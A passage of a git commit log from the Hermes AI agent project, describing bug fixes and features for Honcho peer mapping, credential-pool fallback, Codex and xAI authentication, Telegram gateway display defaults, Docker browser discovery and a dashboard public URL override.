            peerName.  Recommended for personal/single-operator use.

* multi  -- pinPeerName=false, no aliases.  Each runtime user gets
            their own peer.  Optional runtimePeerPrefix for cross-
            platform namespace isolation.

* hybrid -- pinPeerName=false, with userPeerAliases mapping YOUR
            runtime IDs (Telegram UID, Discord snowflake, Slack
            user, Matrix MXID) to peerName.  Multi-user gateway
            where you are a privileged operator.

A 'skip' option leaves existing identity-mapping config untouched —
critical because re-running setup must not silently wipe operator-
curated aliases.

The wizard detects the current shape from existing config so the
prompt's default matches what the operator already has.
2026-05-27 10:49:33 -07:00
erosika c03960decd fix(honcho): include user_id in agent cache signature to prevent shared-thread peer contamination
PR #27371 introduced a per-user-peer resolver in HonchoSessionManager,
but the resolved runtime identity is frozen into the manager at first-
message init.  When the gateway session_key intentionally omits the
participant ID (the default for threads via thread_sessions_per_user=
False), a cached AIAgent created by user A is reused for user B's
messages, attributing B's writes to A's resolved Honcho peer and
breaking #27371's per-user-peer contract.

Fix by including user_id and user_id_alt in _agent_config_signature so
the cache key distinguishes participants in shared threads.  Each user
in a shared thread now triggers a fresh AIAgent build (trading prompt-
cache warmth for memory-attribution correctness — the right tradeoff
for an external-memory backend where misattribution is unrecoverable).

The default-None case keeps the signature byte-identical to pre-fix
behavior so this change doesn't invalidate in-flight caches on deploy.
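
A sketch of how a signature can stay byte-identical in the default-None
case. The hashing scheme and function name here are assumptions, not the
gateway's actual `_agent_config_signature`:

```python
import hashlib
import json


def agent_config_signature(config, user_id=None, user_id_alt=None):
    """Hash the config, adding participant keys only when they are set."""
    fields = dict(config)
    # Omitting unset keys keeps the hash equal to the pre-change value.
    if user_id is not None:
        fields["user_id"] = user_id
    if user_id_alt is not None:
        fields["user_id_alt"] = user_id_alt
    payload = json.dumps(fields, sort_keys=True).encode("utf-8")
    return hashlib.sha256(payload).hexdigest()
```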
2026-05-27 10:49:33 -07:00
erosika 00e6830204 fix(honcho): inherit identity-mapping config in cloned profile blocks
PR #27371 added host-scoped userPeerAliases, runtimePeerPrefix, and
pinPeerName, but the cloned-profile allowlist in
plugins/memory/honcho/cli.py::clone_honcho_for_profile() omitted them.
A new profile created via 'hermes honcho setup' or similar would
silently drop the operator's identity-mapping config, causing gateway
users to resolve to raw runtime IDs and fragmenting Honcho memory
across an unintended set of peers.

Add the three keys to the allowlist and a regression test class
covering all three plus the unset case.
2026-05-27 10:49:33 -07:00
mavrickdeveloper 30b391ab36 Avoid Honcho runtime peer collisions
(cherry picked from commit 4ae3c1a228)
2026-05-27 10:49:33 -07:00
mavrickdeveloper 382b1fc1b6 Cover Honcho runtime peer edge cases
(cherry picked from commit d89a57ea40)
2026-05-27 10:49:33 -07:00
mavrickdeveloper 2e3c6627ce Add Honcho runtime peer mapping
(cherry picked from commit 864cdb3d2e)
2026-05-27 10:49:33 -07:00
zccyman 2e181602a1 fix(agent): isolate credential pool on provider fallback
Closes #33163.

When _try_activate_fallback() switches from one provider to another (e.g.
openai-codex → openrouter), the credential pool still belongs to the
primary provider. This causes two compounding bugs:

1. The pool retains the primary's base_url. Downstream pool recovery
   (rate_limit / billing / auth) calls _swap_credential() with a primary
   entry which overwrites the agent's base_url back to the primary's
   endpoint. Every fallback request then 404s against the wrong host.

2. Pool recovery acting on errors from the FALLBACK provider mutates the
   PRIMARY's pool state (#33088 reported a related corruption pattern),
   exhausting/rotating entries that have nothing to do with the failure.

Two layered fixes:

a) try_activate_fallback (agent/chat_completion_helpers.py): on fallback
   activation, clear agent._credential_pool when the fallback provider
   doesn't match the pool's provider. Pool is preserved when the fallback
   shares the pool's provider (e.g. multiple openrouter entries).

b) recover_with_credential_pool (agent/agent_runtime_helpers.py):
   defensive guard rejects any pool mutation when agent.provider doesn't
   match pool.provider. Defense-in-depth — should never fire after (a)
   is in place, but covers any future path that attaches a stale pool.
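
The two guards can be sketched like this. The `Pool` and `Agent` classes
and both function names are simplified stand-ins, not the real helpers:

```python
from dataclasses import dataclass
from typing import Optional


@dataclass
class Pool:
    provider: str


@dataclass
class Agent:
    provider: str
    credential_pool: Optional[Pool] = None


def activate_fallback(agent: Agent, fallback_provider: str) -> None:
    """(a) Drop the pool when it belongs to a different provider."""
    agent.provider = fallback_provider
    pool = agent.credential_pool
    if pool is not None and pool.provider != fallback_provider:
        agent.credential_pool = None


def can_recover_with_pool(agent: Agent) -> bool:
    """(b) Refuse pool recovery when the pool and agent providers differ."""
    pool = agent.credential_pool
    return pool is not None and pool.provider == agent.provider
```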

Salvaged from @zccyman's PR #33217. The original PR was written against
the pre-refactor monolithic run_agent.py; both target functions have
since been extracted to module-level helpers. Behavior is identical —
the guards live in the canonical extracted locations.

Tests
- New tests/run_agent/test_fallback_credential_isolation.py (7 tests
  covering: fallback clears mismatched pool, fallback preserves matching
  pool, recovery rejects mismatched pool, recovery accepts matching
  pool, 429-from-z.ai-doesn't-exhaust-codex-pool, _client_kwargs
  base_url survives pool clear, _swap_credential doesn't restore
  primary URL after fallback).
- Cross-verified: 77/77 passing across fallback isolation tests +
  agent/test_credential_pool.py — no regression.

Co-authored-by: zccyman <16263913+zccyman@users.noreply.github.com>
2026-05-27 10:45:26 -07:00
JohnC1009 414a5bc924 fix(auth): fall back to global auth.json in _load_provider_state
In profile mode, _load_provider_state previously returned None when a
provider was absent from the profile's auth.json — even if the user had
authenticated at the global root. This broke runtime credential resolvers
that read state directly (resolve_nous_access_token,
resolve_nous_runtime_credentials), causing profiles without their own
nous login to fail with 'Hermes is not logged into Nous Portal' despite
a valid global session.

Push the existing read-only global fallback (already used by
get_provider_auth_state and read_credential_pool) into _load_provider_state
so every caller benefits, and simplify get_provider_auth_state into a thin
wrapper. Writes still target the profile only — profile state continues to
shadow global state on the next read after a per-profile login. Behavior in
classic (non-profile) mode is unchanged because _load_global_auth_store
returns an empty dict.

Adds 5 tests covering the new contract on _load_provider_state directly.
Existing 770 auth/credential/nous tests still pass.
2026-05-27 09:38:58 -07:00
kshitij dd0d5d5a82 chore: add JohnC1009 to AUTHOR_MAP (#33351)
Pre-requisite for PR #32020 salvage (auth: global auth.json fallback
in _load_provider_state). Contributor_audit strict mode fails if any
commit author email on main is unmapped.

Co-authored-by: kshitijk4poor <kshitijk4poor@gmail.com>
2026-05-27 09:37:50 -07:00
LeonSGP43 458a94e425 fix(cli): keep destructive slash modal on Linux 2026-05-27 05:57:01 -07:00
Teknium f0de3cd0a0 fix(agent): roll back switch_model() state when client rebuild fails (#33228)
Closes #33175.

switch_model() in agent/agent_runtime_helpers.py mutated agent.model and
agent.provider before rebuilding the client, with no try/except to restore
them on failure. If the rebuild raised (bad API key, network error,
build_anthropic_client failure, etc.) the agent was left with the new
model+provider name paired with the OLD client — producing HTTP 400s like
"claude-sonnet-4-6 is not supported on openai-codex" on the next turn.

Callers in cli.py, gateway/run.py, and tui_gateway/server.py already catch
the exception and warn the user, but the warning was misleading because
the swap had partially succeeded; the agent's state was torn.

Snapshot every mutated field before the swap, wrap the swap+rebuild block
in try/except, and restore the snapshot on failure before re-raising so
the caller's warning surfaces.
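
A minimal sketch of the snapshot-and-restore pattern. The field list and
the `rebuild_client` callable are hypothetical; the real switch_model()
mutates more state than shown here:

```python
def switch_model(agent, new_model, new_provider, rebuild_client):
    """Swap model/provider/client atomically; restore on rebuild failure."""
    fields = ("model", "provider", "client")
    snapshot = {name: getattr(agent, name) for name in fields}
    try:
        agent.model = new_model
        agent.provider = new_provider
        agent.client = rebuild_client(new_model, new_provider)
    except Exception:
        # Restore every mutated field, then let the caller see the error.
        for name, value in snapshot.items():
            setattr(agent, name, value)
        raise
```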

Reported by @amirariff91. Tests cover both branches (chat_completions and
anthropic_messages) and the cross-branch case (anthropic -> openai).
2026-05-27 05:43:20 -07:00
ethernet 825948edab ci(docker): simplify tagging — push both :main and :latest on main push
Remove the ancestor-check gate and the separate move-latest job.
On main pushes, the merge job now tags both :main and :latest in
a single imagetools create call. Releases still get :<tag> only.

Removed:
- move-latest job (ancestor check + retag dance)
- Decide whether to move :main step (ancestor check in merge)
- Compute tag step
- push_main gate on manifest push
- merge job outputs (nothing downstream needs them anymore)
2026-05-27 05:32:19 -07:00
Teknium b4eea187d5 fix(xai-oauth): gate slash-enum strip on model name + add regression tests (#28490)
Three additions on top of @Nami4D's salvage:

1. Gate the preflight slash-enum strip on the model name pattern
   (grok-* / x-ai/grok-*).  The original PR stripped slash-containing
   enum values from every codex_responses request, but native Codex
   (OpenAI) and GitHub Models DO accept slash enums — stripping them
   there would silently degrade tool-schema constraints.  xAI is the
   only Responses-API surface that rejects the shape.

2. Resolve the merge conflict in agent/transports/codex.py by
   preserving both the timeout-forwarding block that landed on main
   between the PR's branch point and now AND the new service_tier
   strip.  Behavioural intent of both is preserved.

3. Six new tests in tests/agent/transports/test_codex_transport.py
   covering:
   - TestCodexTransportXaiServiceTierStrip (3 tests): xAI strips
     service_tier from request_overrides; non-xAI codex_responses
     and GitHub Models both KEEP service_tier (regression guards
     so the strip stays xAI-only).
   - TestPreflightSlashEnumStrip (3 tests): Grok and aggregator-
     prefixed Grok model names both trigger the safety-net strip;
     non-Grok models preserve slash enums as a regression guard
     against the strip becoming too broad.
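
A rough sketch of a model-gated strip. The helper names are hypothetical,
and dropping an enum that ends up empty is an assumption about the desired
behaviour rather than something the commit states:

```python
def is_grok_model(model: str) -> bool:
    """Match the grok-* and x-ai/grok-* name patterns."""
    name = model.lower()
    return name.startswith("grok-") or name.startswith("x-ai/grok-")


def strip_slash_enums(schema):
    """Return a copy of the schema without enum values that contain '/'."""
    if isinstance(schema, list):
        return [strip_slash_enums(item) for item in schema]
    if not isinstance(schema, dict):
        return schema
    cleaned = {}
    for key, value in schema.items():
        if key == "enum" and isinstance(value, list):
            kept = [v for v in value if not (isinstance(v, str) and "/" in v)]
            if kept:  # assumption: an enum left empty is dropped entirely
                cleaned[key] = kept
        else:
            cleaned[key] = strip_slash_enums(value)
    return cleaned


def preflight_tools(model: str, tools):
    """Apply the strip only for Grok-family model names."""
    return strip_slash_enums(tools) if is_grok_model(model) else tools
```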

51/51 in tests/agent/transports/test_codex_transport.py.

Co-authored-by: Nami4D <hello@nami4d.tech>
2026-05-27 05:25:38 -07:00
Nami4D a699de83ec fix(xai-oauth): strip service_tier and add safety-net sanitization for slash enums
xAI's /v1/responses endpoint rejects service_tier with HTTP 400
"Argument not supported: service_tier" when users activate /fast mode.

Also add a safety-net strip_slash_enum call in _preflight_codex_api_kwargs
to catch any tool schemas that might slip through the caller-level
sanitization. xAI's Responses API grammar compiler rejects enum values
containing forward slashes (e.g. HuggingFace model IDs like
"Qwen/Qwen3.5-0.8B") with the opaque "Invalid arguments passed to the
model" error.

Fixes the root cause of "Invalid arguments passed to the model" errors
reported by xAI OAuth (SuperGrok) users.
2026-05-27 05:25:38 -07:00
Teknium 0325e18f34 fix(gateway): keep Telegram heartbeat + interim commentary on; edit heartbeat in place (#33187)
#33151 turned FOUR Telegram display defaults off:
  - tool_progress: new -> off            (kept: per-tool stream is too chatty)
  - interim_assistant_messages: T -> F   (REVERTED here)
  - long_running_notifications: T -> F   (REVERTED here)
  - busy_ack_detail: T -> F              (kept: verbose iteration counter)

The two flips reverted here were wrong. interim_assistant_messages = the
model's REAL words mid-turn ("I'll inspect the repo first.", "Let me check
both files in parallel"). That is signal, not noise. Suppressing it left
Telegram users staring at "typing..." for the entire turn duration with no
feedback. long_running_notifications = the periodic heartbeat. An agent
that stays silent for 30 minutes is worse than one bubble updating every
3 minutes.

Changes:
  - gateway/display_config.py: Telegram tier-1 inbox keeps both defaults
    on (only tool_progress and busy_ack_detail stay off).
  - gateway/run.py _notify_long_running(): edit a single heartbeat
    message in place (where the adapter supports it) instead of posting
    a new "Still working..." bubble each interval. Telegram, Discord,
    Slack, Matrix all qualify. Falls back to send-new when edit fails.
  - gateway/run.py: tighten heartbeat text. " Still working... (12 min
    elapsed — iteration 21/60, running: terminal)" -> " Working — 12
    min, terminal". Verbose iteration detail moves behind busy_ack_detail
    (one knob now controls both busy acks AND heartbeat verbosity).
  - tests/, cli-config.yaml.example, website/docs/user-guide/messaging:
    updated to reflect the corrected story.
2026-05-27 05:21:53 -07:00
Teknium 69dfcdcc15 fix(auth): codex chat path falls back to credential_pool when singleton is empty
Closes #32992.

The chat path resolves Codex credentials via `resolve_codex_runtime_credentials`
which only reads `providers.openai-codex.tokens` (the singleton). The auxiliary
path uses `_read_codex_access_token` which checks the credential_pool first.
For users whose tokens live only in the pool — manual seed, partial re-auth,
restore from backup, or any state where the singleton is empty but the pool
is healthy — the chat path raised AuthError or (worse, since OpenAI(api_key='')
silently attaches no header) the wire saw HTTP 401 "Missing Authentication header"
while the auxiliary path worked fine.

This adds a pool fallback to `resolve_codex_runtime_credentials`: when the
singleton has no usable access_token, scan `credential_pool.openai-codex` for
the first entry that has a non-empty access_token and isn't in an exhaustion
cooldown window (`last_error_reset_at` in the future). If found, return that
token with `source="credential_pool"`. If no usable entry exists, the original
AuthError propagates as before.
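
The fallback scan might look roughly like this. The data shapes are
assumptions: `last_error_reset_at` is treated as epoch seconds, the local
`AuthError` class is a placeholder, and the "singleton" source label is
invented for the sketch:

```python
import time


class AuthError(Exception):
    """Placeholder for the real AuthError type."""


def resolve_codex_token(singleton_tokens, pool_entries, now=None):
    """Prefer the singleton token; otherwise use the first healthy pool entry."""
    now = time.time() if now is None else now
    token = (singleton_tokens or {}).get("access_token")
    if token:
        return {"access_token": token, "source": "singleton"}
    for entry in pool_entries or []:
        candidate = entry.get("access_token")
        cooldown_until = entry.get("last_error_reset_at") or 0
        # Skip entries with no token or with a cooldown still in the future.
        if candidate and cooldown_until <= now:
            return {"access_token": candidate, "source": "credential_pool"}
    raise AuthError("no usable Codex credentials")
```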

Regression tests cover:
- Empty singleton + healthy pool entry → pool token returned
- Pool fallback skips entries currently in cooldown
- Empty singleton + empty/wedged pool → AuthError propagates (existing contract preserved)
2026-05-27 03:43:51 -07:00
Ben 3e33e14335 fix(docker): discover agent-browser Chromium binary at boot
The image's Dockerfile runs npx playwright install chromium, which
populates $PLAYWRIGHT_BROWSERS_PATH (=/opt/hermes/.playwright) with a
`chromium_headless_shell-<build>/chrome-headless-shell-linux64/` tree.
agent-browser (the runtime CLI Hermes spawns for the browser tool)
doesn't recognise this layout in its own cache scan and fails with
`Auto-launch failed: Chrome not found` — even though the binary is
right there.

Reproduction on current main:

    $ docker run --rm <image> sh -c 'npx -y agent-browser snapshot --url about:blank'
    ✗ Auto-launch failed: Chrome not found. Checked:
      - agent-browser cache: /tmp/.../.agent-browser/browsers
      - System Chrome installations
      - Puppeteer browser cache
      - Playwright browser cache
    Run `agent-browser install` to download Chrome, or use --executable-path.

Fix: at boot, locate the binary under $PLAYWRIGHT_BROWSERS_PATH and
export AGENT_BROWSER_EXECUTABLE_PATH via /run/s6/container_environment
so the with-contenv shebang on main-wrapper.sh propagates it into the
supervised `hermes` process and thence to agent-browser subprocesses.

Filename-matched (chrome / chromium / chrome-headless-shell /
chromium-browser), not path-matched: the chromium dir contains many
shared libraries (libGLESv2.so, libEGL.so, ...) which inherit the
executable bit from Playwright's tarball but are NOT browser binaries.
Compare PR #18635's earlier `find | grep -Ei 'chrome|chromium'` which
would match the path .../chrome-headless-shell-linux64/libGLESv2.so
and pick a .so as the browser binary.
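
The difference between the two matching strategies, illustrated in Python
rather than the shell used by the hook. The sample paths use a placeholder
build number, and both helper names are hypothetical:

```python
import posixpath
import re

BROWSER_NAMES = {"chrome", "chromium", "chrome-headless-shell", "chromium-browser"}

# Placeholder build id "0000"; real directories carry the Playwright build.
BASE = "/opt/hermes/.playwright/chromium_headless_shell-0000/chrome-headless-shell-linux64"
CANDIDATES = [
    BASE + "/libGLESv2.so",
    BASE + "/chrome-headless-shell",
]


def path_match(paths):
    """Path-matched: any path mentioning chrome/chromium, .so files included."""
    return [p for p in paths if re.search(r"chrome|chromium", p, re.IGNORECASE)]


def filename_match(paths):
    """Filename-matched: only entries whose basename is a known browser name."""
    return [p for p in paths if posixpath.basename(p) in BROWSER_NAMES]
```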

User overrides (e.g. `-e AGENT_BROWSER_EXECUTABLE_PATH=/usr/bin/...`)
are respected — the discovery block is skipped when the env var is
already set. Quietly skipped when $PLAYWRIGHT_BROWSERS_PATH doesn't
exist (e.g. custom builds that strip Playwright).

This salvages PR #18635 by @jackey8616, who identified the bug and
proposed the same env-var approach but in the now-deprecated
docker/entrypoint.sh shim and with a path-match find command that
selected .so files instead of the chrome binary. The fix retargets
docker/stage2-hook.sh (the s6-overlay cont-init script where boot-time
env setup belongs) with a corrected filename-match query.

Fixes #15697
Closes #18635

Co-authored-by: Clooooode <12930377+jackey8616@users.noreply.github.com>
2026-05-27 20:43:27 +10:00
helix4u ea34925002 fix(discord): recover Windows voice opus decoding 2026-05-27 03:35:33 -07:00
Ben Barclay bb65bebed7 Merge pull request #30504 from ilonagaja509-glitch/fix/30394-docker-anthropic-package
fix(docker): include anthropic, bedrock, azure-identity extras in image

Fixes #30394. Air-gapped/restricted-network Docker containers can't reach
PyPI for lazy-install, so `--extra anthropic --extra bedrock --extra
azure-identity` are now added to the Dockerfile's `uv sync` so these
provider packages are baked into the published image.

The [all] extra deliberately excludes these (per the 2026-05-12
lazy-install policy on [all]) to keep `uv sync --locked` from breaking
when one of their pinned versions gets PyPI-quarantined. The Dockerfile
adds them back via additive --extra flags, mirroring the existing
--extra messaging pattern (issue #24698 / test_dockerfile_pid1_reaping.py).

Follow-up: separate PR will bump pyproject.toml's [anthropic] extra
from 0.86.0 to 0.87.0 to converge with tools/lazy_deps.py's
CVE-patched pin (CVE-2026-34450, CVE-2026-34452).
2026-05-27 20:29:13 +10:00
Teknium 0b6ace6498 test(verbose): align with telegram tier-1 inbox default
Two tests in test_verbose_command.py asserted Telegram's tool_progress
default was "new" and expected /verbose to cycle that to "all". The
default has since been overridden to "off" in gateway/display_config.py
(_PLATFORM_DEFAULTS for telegram — tier-1 inbox preset that keeps mobile
chats final-answer-first), making the first /verbose invocation cycle
off → new, not new → all.

The behavioral change was intentional; the tests went stale because their
update was left out of that commit. Surfaced as a pre-existing failure on
origin/main
2026-05-27 03:13:15 -07:00
konsisumer f1422ffd77 fix(gateway): classify Codex 429 quota as rate-limit, not missing credentials
When the Codex OAuth token endpoint returns 429 (usage-limit / quota
exhaustion), refresh_codex_oauth_pure raised a generic auth error that the
gateway surfaced as 'Primary provider auth failed: No Codex credentials
stored. Run hermes auth', prompting re-auth that cannot lift a quota cap.

Classify 429 distinctly (codex_rate_limited, relogin_required=False) with a
non-alarming quota message that honors Retry-After, log it as
'Primary provider rate-limited (429)', and stop format_auth_error from
appending the re-authenticate remediation. Also log the fallback provider's
literal config key instead of the resolved runtime category.
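
A sketch of the classification split. Only `codex_rate_limited`,
`relogin_required=False`, and the Retry-After handling come from the text
above; the non-429 branch and its `codex_auth_failed` code are assumptions:

```python
def classify_refresh_failure(status, headers=None):
    """Map a token-endpoint failure to an error code and remediation flag."""
    headers = headers or {}
    if status == 429:
        # Quota exhaustion: re-authenticating cannot lift the cap.
        return {
            "code": "codex_rate_limited",
            "relogin_required": False,
            "retry_after": headers.get("Retry-After"),
        }
    # Assumed default for other failures (hypothetical code name).
    return {"code": "codex_auth_failed", "relogin_required": True, "retry_after": None}
```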

Refs #32790
2026-05-27 03:13:15 -07:00
konsisumer 2bbd53493d fix(cli): sync credential_pool on Codex re-auth
Codex re-auth via `hermes setup` / `hermes model` wrote fresh OAuth
tokens to providers.openai-codex.tokens but left the credential_pool
device_code entry holding the consumed refresh token and stale error
markers. Since the runtime selects from the pool, the next request
spent a dead token and got a 401 token_invalidated. Update the
singleton-seeded pool entries in lockstep and clear their error state.

Fixes #33000
2026-05-27 03:02:06 -07:00
Teknium 4feb181eb4 chore(release): map sir-ad + rdasilva1016-ui in AUTHOR_MAP 2026-05-27 02:41:24 -07:00
Teknium 2f7ba51b80 refactor(gateway): drop try/except wrappers around resolve_display_setting
The two new display-resolution sites added by #31034 (busy_ack_detail
and long_running_notifications) wrapped resolve_display_setting() in
try/except Exception. The existing 4 call sites in this file don't —
the function is safe by contract. Match the established pattern and
drop the redundant guards. -16 LOC, no behaviour change.
2026-05-27 02:41:24 -07:00
houenyang-momo 60f84c6c28 gateway: quiet Telegram operational chatter 2026-05-27 02:41:24 -07:00
Robert DaSilva efa952531b fix: ignore Telegram start pings 2026-05-27 02:41:24 -07:00
sir-ad 8807b1c727 fix(gateway): hide telegram compaction status noise 2026-05-27 02:41:24 -07:00
Teknium 581b0215a5 chore(release): map chaconne67 noreply for #31629 salvage 2026-05-27 02:40:03 -07:00
chaconne67 9c69204d87 fix(codex_responses_adapter): drop foreign-issuer reasoning on replay
reasoning.encrypted_content is sealed to the Responses endpoint that
minted it. When a session switches model providers mid-conversation —
say the user runs /model gpt-5.5 after several turns on grok-4.3, or
vice versa — the persisted codex_reasoning_items carry blobs the new
endpoint cannot decrypt, and every subsequent turn fails with HTTP 400
invalid_encrypted_content.

This is the cross-issuer prevention layer. Pairs with:
* PR #33035 — runtime recovery when the HTTP 400 fires anyway
* PR #33146 — prevention for transient rs_tmp_* items

Stamps each reasoning item with the issuer kind that minted it
(codex_backend / xai_responses / github_responses / other:<url>) at
normalize time, then drops items at replay time when the active
endpoint differs from the stamp. Unstamped (legacy) items pass
through for backwards compatibility.
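
The replay-time filter can be sketched as follows, assuming each item is a
dict and the stamp lives under a hypothetical `issuer_kind` key:

```python
def filter_reasoning_for_replay(items, current_issuer_kind):
    """Keep items minted by the active issuer, plus unstamped legacy items."""
    kept = []
    for item in items:
        stamp = item.get("issuer_kind")  # hypothetical key name
        if stamp is None or stamp == current_issuer_kind:
            kept.append(item)
    return kept
```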

Cherry-picked from @chaconne67's PR #31629. Conflict against current
main (#33035's replay_encrypted_reasoning parameter) resolved as
'keep both' — the two guards compose: replay_encrypted_reasoning=False
is the session-wide kill switch, current_issuer_kind is the per-item
filter that runs only when replay is still enabled.
2026-05-27 02:40:03 -07:00
Teknium c819bc575b chore(release): map kpadilha noreply for #11038 salvage 2026-05-27 02:25:59 -07:00
Krishna b1a46b3047 fix(codex): drop transient rs_tmp reasoning replay state 2026-05-27 02:25:59 -07:00
Teknium 187cf0f257 tools(terminal): nudge homebrewed CI pollers at the tool surface (#33142)
Background processes whose command contains `gh pr view --json
statusCheckRollup` or `gh pr checks | jq` now get a runtime hint in
the result pointing at the canonical green-ci-policy snippets. The
homebrew shape has caused at least seven silent CI-watcher failures
in the past two weeks (#31329, #31448, #31695, #31709, #31745,
#32264, #33131) — each one a different jq/awk/grep variation of the
same fundamental problem (stdout buffering, jq null-key edge cases,
conclusion-vs-status confusion, TTY-only banner grepping).

The skill that documents this anti-pattern is excellent, but a skill
only fires if the agent loads it. The tool surface fires on every
misuse. This is the embed-footguns-in-tool-surface pattern from
PR #31289 applied to a recurring failure mode that's outgrown
skill-only enforcement.

Detector is deliberately narrow — flags two specific shapes:

  1. Any command containing `statusCheckRollup` (the JSON-API path —
     conclusion vs status field semantics keep burning us).
  2. `gh pr view` / `gh pr checks` combined with `jq` (gh pr
     checks doesn't emit JSON, so any `| jq` here is confused intent;
     the canonical column-2 poller uses awk-on-tabs, not jq).

Does NOT flag the blessed column-2 awk-on-tabs poller (which uses
`awk -F"\t" "\$2==\"pending\""`) or the exit-code-driven
`gh pr checks $PR >/dev/null` snippet.

Hint composes with the existing background-without-notify_on_complete
hint — both can fire on the same call. Each is independently
actionable.
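
The two detector shapes described above could be approximated as
follows. This is a sketch, not the shipped detector; the function name
and the exact regexes are assumptions:

```python
import re

# `gh pr view` or `gh pr checks`, tolerant of extra whitespace.
_GH_PR_CMD = re.compile(r"\bgh\s+pr\s+(?:view|checks)\b")
# A standalone `jq` invocation anywhere in the command line.
_JQ = re.compile(r"\bjq\b")


def looks_like_homebrew_ci_poller(command: str) -> bool:
    """Return True for the two narrow shapes the hint targets."""
    # Shape 1: any use of the statusCheckRollup JSON field.
    if "statusCheckRollup" in command:
        return True
    # Shape 2: gh pr view / gh pr checks combined with jq.
    return bool(_GH_PR_CMD.search(command) and _JQ.search(command))
```

Keeping both checks substring- or word-boundary-based means the awk
poller and the exit-code loop pass through untouched.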

Tests:
- 4 new cases in tests/tools/test_notify_on_complete.py
- test_homebrew_ci_poller_via_statusCheckRollup_emits_hint (positive)
- test_homebrew_ci_poller_via_gh_pr_checks_piped_to_jq_emits_hint (positive)
- test_canonical_column2_awk_poller_does_not_emit_homebrew_hint (negative)
- test_canonical_gh_pr_checks_exit_code_loop_does_not_emit_hint (negative)
- test_non_ci_background_command_does_not_emit_homebrew_hint (negative)
- 30/30 passing (was 26)
2026-05-27 02:22:08 -07:00
Ben a890389b69 feat(dashboard-auth): HERMES_DASHBOARD_PUBLIC_URL / dashboard.public_url override
Operators behind reverse proxies that don't reliably forward
X-Forwarded-Host / X-Forwarded-Proto / X-Forwarded-Prefix (manual
nginx setups, on-prem ingresses, custom-domain Fly deploys with
incomplete proxy chains) had no way to force the absolute base URL
the OAuth callback redirects from. The dashboard would reconstruct
the redirect_uri from request headers, the IDP would echo it back,
and the user would land on the wrong host or wrong path — 404.

Add `dashboard.public_url` to config.yaml with env override
HERMES_DASHBOARD_PUBLIC_URL. When set, it is the complete authority —
scheme + host + optional path prefix (e.g. https://example.com/hermes) —
and becomes the base for the OAuth `redirect_uri`. X-Forwarded-Prefix
is IGNORED on this code path because the operator has explicitly
declared the public URL; we no longer need to guess from proxy
headers, and stacking the prefix on top would double-prefix the
common case where the prefix is already baked into public_url.

When unset, the existing proxy_headers + X-Forwarded-Prefix
reconstruction runs untouched. Existing Fly.io deploys continue to
work without configuration — this is purely additive.

Precedence mirrors dashboard.oauth.client_id:

  env (non-empty) > config.yaml > reconstructed from request

Implementation:

  - hermes_cli/config.py: add dashboard.public_url to DEFAULT_CONFIG
    with a multi-paragraph doc comment explaining the use case,
    the X-Forwarded-Prefix interaction, and the validation rules.
  - hermes_cli/dashboard_auth/prefix.py: factored out the existing
    _REJECT_CHARS frozenset, added _normalise_public_url() validator
    (requires http/https scheme + non-empty host + no header-injection
    chars), _load_dashboard_section() loader (robust to load_config
    raising, non-dict shapes), and resolve_public_url() entry point
    with the env-overrides-config precedence. A malformed value
    silently falls through to ""; the caller treats "" as "reconstruct
    from request" so a typo never breaks the login flow.
  - hermes_cli/dashboard_auth/routes.py: rewrite _redirect_uri()
    docstring to spell out the three resolution tiers; add the
    public_url short-circuit before the existing X-Forwarded-Prefix
    splicing. Source-level comment notes that X-Forwarded-Prefix is
    intentionally ignored when public_url is set so a future reader
    doesn't try to "fix" the missing prefix layering.
  - cli-config.yaml.example: extend the existing dashboard section
    with a public_url block.
  - website/docs/user-guide/features/web-dashboard.md: new "Public
    URL override" section between the provider configuration and
    the OAuth flow walkthrough. Documents the env-vs-config table,
    the validation rules, and the `http://` `public_url` ↔ Secure
    cookie footgun.
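
A rough sketch of the resolution order and validation described above,
under stated assumptions: the function names drop the leading
underscore, the contents of the reject set are a guess, and a malformed
env value is assumed to resolve to "" rather than fall back to
config.yaml:

```python
import os
from typing import Mapping
from urllib.parse import urlsplit

# Assumed contents; the real _REJECT_CHARS set is not shown in this log.
REJECT_CHARS = frozenset("\r\n\"'<>")


def normalise_public_url(value: str) -> str:
    """Return a cleaned base URL, or "" when the value is unusable."""
    if not value or any(ch in REJECT_CHARS for ch in value):
        return ""
    value = value.strip()
    try:
        parts = urlsplit(value)
    except ValueError:
        return ""
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return ""
    return value.rstrip("/")  # avoids //auth/callback when joined later


def resolve_public_url(config: dict, environ: Mapping[str, str] = os.environ) -> str:
    """env (non-empty) > config.yaml > "" (caller reconstructs from the request)."""
    env_value = environ.get("HERMES_DASHBOARD_PUBLIC_URL", "").strip()
    if env_value:
        return normalise_public_url(env_value)
    dashboard = config.get("dashboard")
    if not isinstance(dashboard, dict):
        return ""  # non-dict shape: behave as if unset
    return normalise_public_url(str(dashboard.get("public_url") or ""))
```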

Test coverage — new TestPublicUrlOverride class (8 tests):

  - env var overrides request reconstruction (the primary motivating
    case)
  - config.yaml used when env unset
  - env wins over config (precedence pin)
  - public_url with a path prefix already baked in (the Q1-a case the
    user explicitly chose)
  - public_url suppresses X-Forwarded-Prefix layering (defends
    against the double-prefix bug)
  - trailing slash stripped from public_url (no //auth/callback)
  - malformed public_url falls through to reconstruction (six
    hostile inputs: javascript:, ftp:, missing scheme, missing host,
    quote chars, CRLF injection)
  - empty env string doesn't shadow config.yaml entry (CI / Fly
    provisioned-but-empty secret case)

Mutation-tested: flipping the precedence in resolve_public_url() trips
exactly test_env_overrides_config_public_url; weakening the validator
(accept any scheme) trips exactly test_malformed_public_url_falls_through_to_reconstruction.
Both other tests in each pair stay green, confirming the suite
discriminates the specific regression each test pins.
2026-05-27 02:12:27 -07:00
Ben 0af37ff272 style(dashboard-auth): redesign /login page to match Nous design system
The login page is the first surface the user sees on a gated dashboard
and shipped with off-the-shelf system fonts and a generic orange
accent that didn't match the React dashboard waiting on the other
side of the OAuth round trip. Apply the same visual language the SPA
uses (the @nous-research/ui package) so the auth flow feels like one
product, not two.

What changes (visual only — no functional changes):

  Typography
    - Body: Collapse (regular + bold), served from /fonts/ — the same
      woff2 files the dashboard SPA loads via the design-system's
      fonts.css.
    - Display: Rules Compressed (regular + medium) for the brand
      wordmark and the page heading.
    - Brand chrome (heading, buttons, footer) uses the DS idiom:
      uppercase + letter-spacing 0.2em (matching the DS Button class).

  Colour
    - Background: #170d02 (deep brown-black; --background-base in DS).
    - Accent: #ffac02 (amber; --midground in DS).
    - Foreground: #ffffff.
    - Hairlines: color-mix() of the midground at 18% / 35%, mirroring
      the DS "@theme inline" derived tokens.

  Button surface
    - Solid amber surface with dark text, no rounded corners (DS Button
      is squared). The inset bevel directly mirrors the DS Button
